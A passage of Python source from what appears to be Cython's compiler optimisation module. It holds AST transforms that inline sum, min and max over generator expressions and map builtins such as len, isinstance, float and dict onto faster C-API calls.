listcomp_assign_node = Nodes.SingleAssignmentNode(
node.pos, lhs = result_node, rhs = listcomp_node, first = True)
sort_method = ExprNodes.AttributeNode(
node.pos, obj = result_node, attribute = EncodedString('sort'),
# entry ? type ?
needs_none_check = False)
sort_node = Nodes.ExprStatNode(
node.pos, expr = ExprNodes.SimpleCallNode(
node.pos, function = sort_method, args = []))
sort_node.analyse_declarations(self.current_env())
return UtilNodes.TempResultFromStatNode(
result_node,
Nodes.StatListNode(node.pos, stats = [ listcomp_assign_node, sort_node ]))
def _handle_simple_function_sum(self, node, pos_args):
"""Transform sum(genexpr) into an equivalent inlined aggregation loop.
"""
if len(pos_args) not in (1,2):
return node
if not isinstance(pos_args[0], (ExprNodes.GeneratorExpressionNode,
ExprNodes.ComprehensionNode)):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
if isinstance(gen_expr_node, ExprNodes.GeneratorExpressionNode):
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
else: # ComprehensionNode
yield_stat_node = gen_expr_node.append
yield_expression = yield_stat_node.expr
try:
if not yield_expression.is_literal or not yield_expression.type.is_int:
return node
except AttributeError:
return node # in case we don't have a type yet
# special case: old Py2 backwards compatible "sum([int_const for ...])"
# can safely be unpacked into a genexpr
if len(pos_args) == 1:
start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
else:
start = pos_args[1]
result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.py_object_type)
add_node = Nodes.SingleAssignmentNode(
yield_expression.pos,
lhs = result_ref,
rhs = ExprNodes.binop_node(node.pos, '+', result_ref, yield_expression)
)
Visitor.recursively_replace_node(loop_node, yield_stat_node, add_node)
exec_code = Nodes.StatListNode(
node.pos,
stats = [
Nodes.SingleAssignmentNode(
start.pos,
lhs = UtilNodes.ResultRefNode(pos=node.pos, expression=result_ref),
rhs = start,
first = True),
loop_node
])
return ExprNodes.InlinedGeneratorExpressionNode(
gen_expr_node.pos, loop = exec_code, result_node = result_ref,
expr_scope = gen_expr_node.expr_scope, orig_func = 'sum',
has_local_scope = gen_expr_node.has_local_scope)
def _handle_simple_function_min(self, node, pos_args):
return self._optimise_min_max(node, pos_args, '<')
def _handle_simple_function_max(self, node, pos_args):
return self._optimise_min_max(node, pos_args, '>')
def _optimise_min_max(self, node, args, operator):
"""Replace min(a,b,...) and max(a,b,...) by explicit comparison code.
"""
if len(args) <= 1:
if len(args) == 1 and args[0].is_sequence_constructor:
args = args[0].args
else:
# leave this to Python
return node
cascaded_nodes = list(map(UtilNodes.ResultRefNode, args[1:]))
last_result = args[0]
for arg_node in cascaded_nodes:
result_ref = UtilNodes.ResultRefNode(last_result)
last_result = ExprNodes.CondExprNode(
arg_node.pos,
true_val = arg_node,
false_val = result_ref,
test = ExprNodes.PrimaryCmpNode(
arg_node.pos,
operand1 = arg_node,
operator = operator,
operand2 = result_ref,
)
)
last_result = UtilNodes.EvalWithTempExprNode(result_ref, last_result)
for ref_node in cascaded_nodes[::-1]:
last_result = UtilNodes.EvalWithTempExprNode(ref_node, last_result)
return last_result
def _DISABLED_handle_simple_function_tuple(self, node, pos_args):
if not pos_args:
return ExprNodes.TupleNode(node.pos, args=[], constant_result=())
# This is a bit special - for iterables (including genexps),
# Python actually overallocates and resizes a newly created
# tuple incrementally while reading items, which we can't
# easily do without explicit node support. Instead, we read
# the items into a list and then copy them into a tuple of the
# final size. This takes up to twice as much memory, but will
# have to do until we have real support for genexps.
result = self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)
if result is not node:
return ExprNodes.AsTupleNode(node.pos, arg=result)
return node
def _handle_simple_function_frozenset(self, node, pos_args):
"""Replace frozenset([...]) by frozenset((...)) as tuples are more efficient.
"""
if len(pos_args) != 1:
return node
if pos_args[0].is_sequence_constructor and not pos_args[0].args:
del pos_args[0]
elif isinstance(pos_args[0], ExprNodes.ListNode):
pos_args[0] = pos_args[0].as_tuple()
return node
def _handle_simple_function_list(self, node, pos_args):
if not pos_args:
return ExprNodes.ListNode(node.pos, args=[], constant_result=[])
return self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)
def _handle_simple_function_set(self, node, pos_args):
if not pos_args:
return ExprNodes.SetNode(node.pos, args=[], constant_result=set())
return self._transform_list_set_genexpr(node, pos_args, Builtin.set_type)
def _transform_list_set_genexpr(self, node, pos_args, target_type):
"""Replace set(genexpr) and list(genexpr) by a literal comprehension.
"""
if len(pos_args) > 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
append_node = ExprNodes.ComprehensionAppendNode(
yield_expression.pos,
expr = yield_expression)
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
comp = ExprNodes.ComprehensionNode(
node.pos,
has_local_scope = True,
expr_scope = gen_expr_node.expr_scope,
loop = loop_node,
append = append_node,
type = target_type)
append_node.target = comp
return comp
def _handle_simple_function_dict(self, node, pos_args):
"""Replace dict( (a,b) for ... ) by a literal { a:b for ... }.
"""
if len(pos_args) == 0:
return ExprNodes.DictNode(node.pos, key_value_pairs=[], constant_result={})
if len(pos_args) > 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
if not isinstance(yield_expression, ExprNodes.TupleNode):
return node
if len(yield_expression.args) != 2:
return node
append_node = ExprNodes.DictComprehensionAppendNode(
yield_expression.pos,
key_expr = yield_expression.args[0],
value_expr = yield_expression.args[1])
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
dictcomp = ExprNodes.ComprehensionNode(
node.pos,
has_local_scope = True,
expr_scope = gen_expr_node.expr_scope,
loop = loop_node,
append = append_node,
type = Builtin.dict_type)
append_node.target = dictcomp
return dictcomp
# specific handlers for general call nodes
def _handle_general_function_dict(self, node, pos_args, kwargs):
"""Replace dict(a=b,c=d,...) by the underlying keyword dict
construction which is done anyway.
"""
if len(pos_args) > 0:
return node
if not isinstance(kwargs, ExprNodes.DictNode):
return node
return kwargs
class InlineDefNodeCalls(Visitor.NodeRefCleanupMixin, Visitor.EnvTransform):
visit_Node = Visitor.VisitorTransform.recurse_to_children
def get_constant_value_node(self, name_node):
if name_node.cf_state is None:
return None
if name_node.cf_state.cf_is_null:
return None
entry = self.current_env().lookup(name_node.name)
if not entry or (not entry.cf_assignments
or len(entry.cf_assignments) != 1):
# not just a single assignment in all closures
return None
return entry.cf_assignments[0].rhs
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
if not self.current_directives.get('optimize.inline_defnode_calls'):
return node
function_name = node.function
if not function_name.is_name:
return node
function = self.get_constant_value_node(function_name)
if not isinstance(function, ExprNodes.PyCFunctionNode):
return node
inlined = ExprNodes.InlinedDefNodeCallNode(
node.pos, function_name=function_name,
function=function, args=node.args)
if inlined.can_be_inlined():
return self.replace(node, inlined)
return node
class OptimizeBuiltinCalls(Visitor.MethodDispatcherTransform):
"""Optimize some common methods calls and instantiation patterns
for builtin types *after* the type analysis phase.
Running after type analysis, this transform can only perform
function replacements that do not alter the function return type
in a way that was not anticipated by the type analysis.
"""
### cleanup to avoid redundant coercions to/from Python types
def _visit_PyTypeTestNode(self, node):
# disabled - appears to break assignments in some cases, and
# also drops a None check, which might still be required
"""Flatten redundant type checks after tree changes.
"""
old_arg = node.arg
self.visitchildren(node)
if old_arg is node.arg or node.arg.type != node.type:
return node
return node.arg
def _visit_TypecastNode(self, node):
# disabled - the user may have had a reason to put a type
# cast, even if it looks redundant to Cython
"""
Drop redundant type casts.
"""
self.visitchildren(node)
if node.type == node.operand.type:
return node.operand
return node
def visit_ExprStatNode(self, node):
"""
Drop useless coercions.
"""
self.visitchildren(node)
if isinstance(node.expr, ExprNodes.CoerceToPyTypeNode):
node.expr = node.expr.arg
return node
def visit_CoerceToBooleanNode(self, node):
"""Drop redundant conversion nodes after tree changes.
"""
self.visitchildren(node)
arg = node.arg
if isinstance(arg, ExprNodes.PyTypeTestNode):
arg = arg.arg
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.type in (PyrexTypes.py_object_type, Builtin.bool_type):
return arg.arg.coerce_to_boolean(self.current_env())
return node
def visit_CoerceFromPyTypeNode(self, node):
"""Drop redundant conversion nodes after tree changes.
Also, optimise away calls to Python's builtin int() and
float() if the result is going to be coerced back into a C
type anyway.
"""
self.visitchildren(node)
arg = node.arg
if not arg.type.is_pyobject:
# no Python conversion left at all, just do a C coercion instead
if node.type == arg.type:
return arg
else:
return arg.coerce_to(node.type, self.current_env())
if isinstance(arg, ExprNodes.PyTypeTestNode):
arg = arg.arg
if arg.is_literal:
if (node.type.is_int and isinstance(arg, ExprNodes.IntNode) or
node.type.is_float and isinstance(arg, ExprNodes.FloatNode) or
node.type.is_int and isinstance(arg, ExprNodes.BoolNode)):
return arg.coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.type is PyrexTypes.py_object_type:
if node.type.assignable_from(arg.arg.type):
# completely redundant C->Py->C coercion
return arg.arg.coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.SimpleCallNode):
if node.type.is_int or node.type.is_float:
return self._optimise_numeric_cast_call(node, arg)
elif isinstance(arg, ExprNodes.IndexNode) and not arg.is_buffer_access:
index_node = arg.index
if isinstance(index_node, ExprNodes.CoerceToPyTypeNode):
index_node = index_node.arg
if index_node.type.is_int:
return self._optimise_int_indexing(node, arg, index_node)
return node
PyBytes_GetItemInt_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_char_type, [
PyrexTypes.CFuncTypeArg("bytes", Builtin.bytes_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("check_bounds", PyrexTypes.c_int_type, None),
],
exception_value = "((char)-1)",
exception_check = True)
def _optimise_int_indexing(self, coerce_node, arg, index_node):
env = self.current_env()
bound_check_bool = env.directives['boundscheck'] and 1 or 0
if arg.base.type is Builtin.bytes_type:
if coerce_node.type in (PyrexTypes.c_char_type, PyrexTypes.c_uchar_type):
# bytes[index] -> char
bound_check_node = ExprNodes.IntNode(
coerce_node.pos, value=str(bound_check_bool),
constant_result=bound_check_bool)
node = ExprNodes.PythonCapiCallNode(
coerce_node.pos, "__Pyx_PyBytes_GetItemInt",
self.PyBytes_GetItemInt_func_type,
args=[
arg.base.as_none_safe_node("'NoneType' object is not subscriptable"),
index_node.coerce_to(PyrexTypes.c_py_ssize_t_type, env),
bound_check_node,
],
is_temp=True,
utility_code=UtilityCode.load_cached(
'bytes_index', 'StringTools.c'))
if coerce_node.type is not PyrexTypes.c_char_type:
node = node.coerce_to(coerce_node.type, env)
return node
return coerce_node
def _optimise_numeric_cast_call(self, node, arg):
function = arg.function
if not isinstance(function, ExprNodes.NameNode) \
or not function.type.is_builtin_type \
or not isinstance(arg.arg_tuple, ExprNodes.TupleNode):
return node
args = arg.arg_tuple.args
if len(args) != 1:
return node
func_arg = args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
func_arg = func_arg.arg
elif func_arg.type.is_pyobject:
# play safe: Python conversion might work on all sorts of things
return node
if function.name == 'int':
if func_arg.type.is_int or node.type.is_int:
if func_arg.type == node.type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
elif function.name == 'float':
if func_arg.type.is_float or node.type.is_float:
if func_arg.type == node.type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
return node
def _error_wrong_arg_count(self, function_name, node, args, expected=None):
if not expected: # None or 0
arg_str = ''
elif isinstance(expected, basestring) or expected > 1:
arg_str = '...'
elif expected == 1:
arg_str = 'x'
else:
arg_str = ''
if expected is not None:
expected_str = 'expected %s, ' % expected
else:
expected_str = ''
error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
function_name, arg_str, expected_str, len(args)))
### generic fallbacks
def _handle_function(self, node, function_name, function, arg_list, kwargs):
return node
def _handle_method(self, node, type_name, attr_name, function,
arg_list, is_unbound_method, kwargs):
"""
Try to inject C-API calls for unbound method calls to builtin types.
While the method declarations in Builtin.py already handle this, we
can additionally resolve bound and unbound methods here that were
assigned to variables ahead of time.
"""
if kwargs:
return node
if not function or not function.is_attribute or not function.obj.is_name:
# cannot track unbound method calls over more than one indirection as
# the names might have been reassigned in the meantime
return node
type_entry = self.current_env().lookup(type_name)
if not type_entry:
return node
method = ExprNodes.AttributeNode(
node.function.pos,
obj=ExprNodes.NameNode(
function.pos,
name=type_name,
entry=type_entry,
type=type_entry.type),
attribute=attr_name,
is_called=True).analyse_as_unbound_cmethod_node(self.current_env())
if method is None:
return node
args = node.args
if args is None and node.arg_tuple:
args = node.arg_tuple.args
call_node = ExprNodes.SimpleCallNode(
node.pos,
function=method,
args=args)
if not is_unbound_method:
call_node.self = function.obj
call_node.analyse_c_function_call(self.current_env())
call_node.analysed = True
return call_node.coerce_to(node.type, self.current_env())
### builtin types
PyDict_Copy_func_type = PyrexTypes.CFuncType(
Builtin.dict_type, [
PyrexTypes.CFuncTypeArg("dict", Builtin.dict_type, None)
])
def _handle_simple_function_dict(self, node, function, pos_args):
"""Replace dict(some_dict) by PyDict_Copy(some_dict).
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if arg.type is Builtin.dict_type:
arg = arg.as_none_safe_node("'NoneType' is not iterable")
return ExprNodes.PythonCapiCallNode(
node.pos, "PyDict_Copy", self.PyDict_Copy_func_type,
args = [arg],
is_temp = node.is_temp
)
return node
PyList_AsTuple_func_type = PyrexTypes.CFuncType(
Builtin.tuple_type, [
PyrexTypes.CFuncTypeArg("list", Builtin.list_type, None)
])
def _handle_simple_function_tuple(self, node, function, pos_args):
"""Replace tuple([...]) by a call to PyList_AsTuple.
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if arg.type is Builtin.tuple_type and not arg.may_be_none():
return arg
if arg.type is not Builtin.list_type:
return node
pos_args[0] = arg.as_none_safe_node(
"'NoneType' object is not iterable")
return ExprNodes.PythonCapiCallNode(
node.pos, "PyList_AsTuple", self.PyList_AsTuple_func_type,
args = pos_args,
is_temp = node.is_temp
)
PySet_New_func_type = PyrexTypes.CFuncType(
Builtin.set_type, [
PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_set(self, node, function, pos_args):
if len(pos_args) != 1:
return node
if pos_args[0].is_sequence_constructor:
# We can optimise set([x,y,z]) safely into a set literal,
# but only if we create all items before adding them -
# adding an item may raise an exception if it is not
# hashable, but creating the later items may have
# side-effects.
args = []
temps = []
for arg in pos_args[0].args:
if not arg.is_simple():
arg = UtilNodes.LetRefNode(arg)
temps.append(arg)
args.append(arg)
result = ExprNodes.SetNode(node.pos, is_temp=1, args=args)
for temp in temps[::-1]:
result = UtilNodes.EvalWithTempExprNode(temp, result)
return result
else:
# PySet_New(it) is better than a generic Python call to set(it)
return ExprNodes.PythonCapiCallNode(
node.pos, "PySet_New",
self.PySet_New_func_type,
args=pos_args,
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached('pyset_compat', 'Builtins.c'),
py_name="set")
PyFrozenSet_New_func_type = PyrexTypes.CFuncType(
Builtin.frozenset_type, [
PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_frozenset(self, node, function, pos_args):
if not pos_args:
pos_args = [ExprNodes.NullNode(node.pos)]
elif len(pos_args) > 1:
return node
elif pos_args[0].type is Builtin.frozenset_type and not pos_args[0].may_be_none():
return pos_args[0]
# PyFrozenSet_New(it) is better than a generic Python call to frozenset(it)
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyFrozenSet_New",
self.PyFrozenSet_New_func_type,
args=pos_args,
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached('pyfrozenset_new', 'Builtins.c'),
py_name="frozenset")
PyObject_AsDouble_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_double_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "((double)-1)",
exception_check = True)
def _handle_simple_function_float(self, node, function, pos_args):
"""Transform float() into either a C type cast or a faster C
function call.
"""
# Note: this requires the float() function to be typed as
# returning a C 'double'
if len(pos_args) == 0:
return ExprNodes.FloatNode(
                node.pos, value="0.0", constant_result=0.0
).coerce_to(Builtin.float_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('float', node, pos_args, '0 or 1')
return node
func_arg = pos_args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
func_arg = func_arg.arg
if func_arg.type is PyrexTypes.c_double_type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_numeric:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyObject_AsDouble",
self.PyObject_AsDouble_func_type,
args = pos_args,
is_temp = node.is_temp,
utility_code = load_c_utility('pyobject_as_double'),
py_name = "float")
PyNumber_Int_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("o", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_int(self, node, function, pos_args):
"""Transform int() into a faster C function call.
"""
if len(pos_args) == 0:
            return ExprNodes.IntNode(node.pos, value="0", constant_result=0,
type=PyrexTypes.py_object_type)
elif len(pos_args) != 1:
return node # int(x, base)
func_arg = pos_args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
return node # handled in visit_CoerceFromPyTypeNode()
if func_arg.type.is_pyobject and node.type.is_pyobject:
return ExprNodes.PythonCapiCallNode(
node.pos, "PyNumber_Int", self.PyNumber_Int_func_type,
args=pos_args, is_temp=True)
return node
def _handle_simple_function_bool(self, node, function, pos_args):
"""Transform bool(x) into a type coercion to a boolean.
"""
if len(pos_args) == 0:
return ExprNodes.BoolNode(
node.pos, value=False, constant_result=False
).coerce_to(Builtin.bool_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('bool', node, pos_args, '0 or 1')
return node
else:
# => !!<bint>(x) to make sure it's exactly 0 or 1
operand = pos_args[0].coerce_to_boolean(self.current_env())
operand = ExprNodes.NotNode(node.pos, operand = operand)
operand = ExprNodes.NotNode(node.pos, operand = operand)
# coerce back to Python object as that's the result we are expecting
return operand.coerce_to_pyobject(self.current_env())
### builtin functions
Pyx_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("bytes", PyrexTypes.c_char_ptr_type, None)
])
Pyx_Py_UNICODE_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("unicode", PyrexTypes.c_py_unicode_ptr_type, None)
])
PyObject_Size_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None)
],
exception_value="-1")
_map_to_capi_len_function = {
Builtin.unicode_type : "__Pyx_PyUnicode_GET_LENGTH",
Builtin.bytes_type : "PyBytes_GET_SIZE",
Builtin.list_type : "PyList_GET_SIZE",
Builtin.tuple_type : "PyTuple_GET_SIZE",
Builtin.dict_type : "PyDict_Size",
Builtin.set_type : "PySet_Size",
Builtin.frozenset_type : "PySet_Size",
}.get
_ext_types_with_pysize = set(["cpython.array.array"])
def _handle_simple_function_len(self, node, function, pos_args):
"""Replace len(char*) by the equivalent call to strlen(),
len(Py_UNICODE) by the equivalent Py_UNICODE_strlen() and
len(known_builtin_type) by an equivalent C-API call.
"""
if len(pos_args) != 1:
self._error_wrong_arg_count('len', node, pos_args, 1)
return node
arg = pos_args[0]
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
arg = arg.arg
if arg.type.is_string:
new_node = ExprNodes.PythonCapiCallNode(
node.pos, "strlen", self.Pyx_strlen_func_type,
args = [arg],
is_temp = node.is_temp,
utility_code = UtilityCode.load_cached("IncludeStringH", "StringTools.c"))
elif arg.type.is_pyunicode_ptr:
new_node = ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py_UNICODE_strlen", self.Pyx_Py_UNICODE_strlen_func_type,
args = [arg],
is_temp = node.is_temp)
elif arg.type.is_pyobject:
cfunc_name = self._map_to_capi_len_function(arg.type)
if cfunc_name is None:
arg_type = arg.type
if ((arg_type.is_extension_type or arg_type.is_builtin_type)
and arg_type.entry.qualified_name in self._ext_types_with_pysize):
cfunc_name = 'Py_SIZE'
else:
return node
arg = arg.as_none_safe_node(
"object of type 'NoneType' has no len()")
new_node = ExprNodes.PythonCapiCallNode(
node.pos, cfunc_name, self.PyObject_Size_func_type,
args = [arg],
is_temp = node.is_temp)
elif arg.type.is_unicode_char:
return ExprNodes.IntNode(node.pos, value='1', constant_result=1,
type=node.type)
else:
return node
if node.type not in (PyrexTypes.c_size_t_type, PyrexTypes.c_py_ssize_t_type):
new_node = new_node.coerce_to(node.type, self.current_env())
return new_node
Pyx_Type_func_type = PyrexTypes.CFuncType(
Builtin.type_type, [
PyrexTypes.CFuncTypeArg("object", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_type(self, node, function, pos_args):
"""Replace type(o) by a macro call to Py_TYPE(o).
"""
if len(pos_args) != 1:
return node
node = ExprNodes.PythonCapiCallNode(
node.pos, "Py_TYPE", self.Pyx_Type_func_type,
args = pos_args,
is_temp = False)
return ExprNodes.CastNode(node, PyrexTypes.py_object_type)
Py_type_check_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("arg", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_isinstance(self, node, function, pos_args):
"""Replace isinstance() checks against builtin types by the
corresponding C-API call.
"""
if len(pos_args) != 2:
return node
arg, types = pos_args
temp = None
if isinstance(types, ExprNodes.TupleNode):
types = types.args
if arg.is_attribute or not arg.is_simple():
arg = temp = UtilNodes.ResultRefNode(arg)
elif types.type is Builtin.type_type:
types = [types]
else:
return node
tests = []
test_nodes = []
env = self.current_env()
for test_type_node in types:
builtin_type = None
if test_type_node.is_name:
if test_type_node.entry:
entry = env.lookup(test_type_node.entry.name)
if entry and entry.type and entry.type.is_builtin_type:
builtin_type = entry.type
if builtin_type is Builtin.type_type:
# all types have type "type", but there's only one 'type'
if entry.name != 'type' or not (
entry.scope and entry.scope.is_builtin_scope):
builtin_type = None
if builtin_type is not None:
type_check_function = entry.type.type_check_function(exact=False)
if type_check_function in tests:
continue
tests.append(type_check_function)
type_check_args = [arg]
elif test_type_node.type is Builtin.type_type:
type_check_function = '__Pyx_TypeCheck'
type_check_args = [arg, test_type_node]
else:
return node
test_nodes.append(
ExprNodes.PythonCapiCallNode(
test_type_node.pos, type_check_function, self.Py_type_check_func_type,
args = type_check_args,
is_temp = True,
))
def join_with_or(a,b, make_binop_node=ExprNodes.binop_node):
or_node = make_binop_node(node.pos, 'or', a, b)
or_node.type = PyrexTypes.c_bint_type
or_node.is_temp = True
return or_node
test_node = reduce(join_with_or, test_nodes).coerce_to(node.type, env)
if temp is not None:
test_node = UtilNodes.EvalWithTempExprNode(temp, test_node)
return test_node
def _handle_simple_function_ord(self, node, function, pos_args):
"""Unpack ord(Py_UNICODE) and ord('X').
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.arg.type.is_unicode_char:
return ExprNodes.TypecastNode(
arg.pos, operand=arg.arg, type=PyrexTypes.c_int_type
).coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.UnicodeNode):
if len(arg.value) == 1:
return ExprNodes.IntNode(
arg.pos, type=PyrexTypes.c_int_type,
value=str(ord(arg.value)),
constant_result=ord(arg.value)
).coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.StringNode):
if arg.unicode_value and len(arg.unicode_value) == 1 \
and ord(arg.unicode_value) <= 255: # Py2/3 portability
return ExprNodes.IntNode(
arg.pos, type=PyrexTypes.c_int_type,
value=str(ord(arg.unicode_value)),
constant_result=ord(arg.unicode_value)
).coerce_to(node.type, self.current_env())
return node
### special methods
Pyx_tp_new_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
])
Pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
PyrexTypes.CFuncTypeArg("kwargs", Builtin.dict_type, None),
])
def _handle_any_slot__new__(self, node, function, args,
is_unbound_method, kwargs=None):
"""Replace 'exttype.__new__(exttype, ...)' by a call to exttype->tp_new()
"""
obj = function.obj
if not is_unbound_method or len(args) < 1:
return node
type_arg = args[0]
if not obj.is_name or not type_arg.is_name:
# play safe
return node
if obj.type != Builtin.type_type or type_arg.type != Builtin.type_type:
# not a known type, play safe
return node
if not type_arg.type_entry or not obj.type_entry:
if obj.name != type_arg.name:
return node
# otherwise, we know it's a type and we know it's the same
# type for both - that should do
elif type_arg.type_entry != obj.type_entry:
# different types - may or may not lead to an error at runtime
return node
args_tuple = ExprNodes.TupleNode(node.pos, args=args[1:])
args_tuple = args_tuple.analyse_types(
self.current_env(), skip_children=True)
if type_arg.type_entry:
ext_type = type_arg.type_entry.type
if (ext_type.is_extension_type and ext_type.typeobj_cname and
ext_type.scope.global_scope() == self.current_env().global_scope()):
# known type in current module
tp_slot = TypeSlots.ConstructorSlot("tp_new", '__new__')
slot_func_cname = TypeSlots.get_slot_function(ext_type.scope, tp_slot)
if slot_func_cname:
cython_scope = self.context.cython_scope
PyTypeObjectPtr = PyrexTypes.CPtrType(
cython_scope.lookup('PyTypeObject').type)
pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyTypeObjectPtr, None),
PyrexTypes.CFuncTypeArg("args", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("kwargs", PyrexTypes.py_object_type, None),
])
type_arg = ExprNodes.CastNode(type_arg, PyTypeObjectPtr)
if not kwargs:
kwargs = ExprNodes.NullNode(node.pos, type=PyrexTypes.py_object_type) # hack?
return ExprNodes.PythonCapiCallNode(
node.pos, slot_func_cname,
pyx_tp_new_kwargs_func_type,
args=[type_arg, args_tuple, kwargs],
is_temp=True)
else:
# arbitrary variable, needs a None check for safety
type_arg = type_arg.as_none_safe_node(
"object.__new__(X): X is not a type object (NoneType)")
utility_code = UtilityCode.load_cached('tp_new', 'ObjectHandling.c')
if kwargs:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_tp_new_kwargs", self.Pyx_tp_new_kwargs_func_type,
args=[type_arg, args_tuple, kwargs],
utility_code=utility_code,
is_temp=node.is_temp
)
else:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_tp_new", self.Pyx_tp_new_func_type,
args=[type_arg, args_tuple],
utility_code=utility_code,
is_temp=node.is_temp
)
### methods of builtin types
PyObject_Append_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("item", PyrexTypes.py_object_type, None),
],
exception_value="-1")
def _handle_simple_method_object_append(self, node, function, args, is_unbound_method):
"""Optimistic optimisation as X.append() is almost always
referring to a list.
"""
if len(args) != 2 or node.result_is_used:
return node
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyObject_Append", self.PyObject_Append_func_type,
args=args,
may_return_none=False,
is_temp=node.is_temp,
result_is_used=False,
utility_code=load_c_utility('append')
)
PyByteArray_Append_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("value", PyrexTypes.c_int_type, None),
],
exception_value="-1")
PyByteArray_AppendObject_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("value", PyrexTypes.py_object_type, None),
],
exception_value="-1")
def _handle_simple_method_bytearray_append(self, node, function, args, is_unbound_method):
if len(args) != 2:
return node
func_name = "__Pyx_PyByteArray_Append"
func_type = self.PyByteArray_Append_func_type
value = unwrap_coerced_node(args[1])
if value.type.is_int or isinstance(value, ExprNodes.IntNode):
value = value.coerce_to(PyrexTypes.c_int_type, self.current_env())
utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
elif value.is_string_literal:
if not value.can_coerce_to_char_literal():
return node
value = value.coerce_to(PyrexTypes.c_char_type, self.current_env())
utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
elif value.type.is_pyobject:
func_name = "__Pyx_PyByteArray_AppendObject"
func_type = self.PyByteArray_AppendObject_func_type
utility_code = UtilityCode.load_cached("ByteArrayAppendObject", "StringTools.c")
else:
return node
new_node = ExprNodes.PythonCapiCallNode(
node.pos, func_name, func_type,
args=[args[0], value],
may_return_none=False,
is_temp=node.is_temp,
utility_code=utility_code,
)
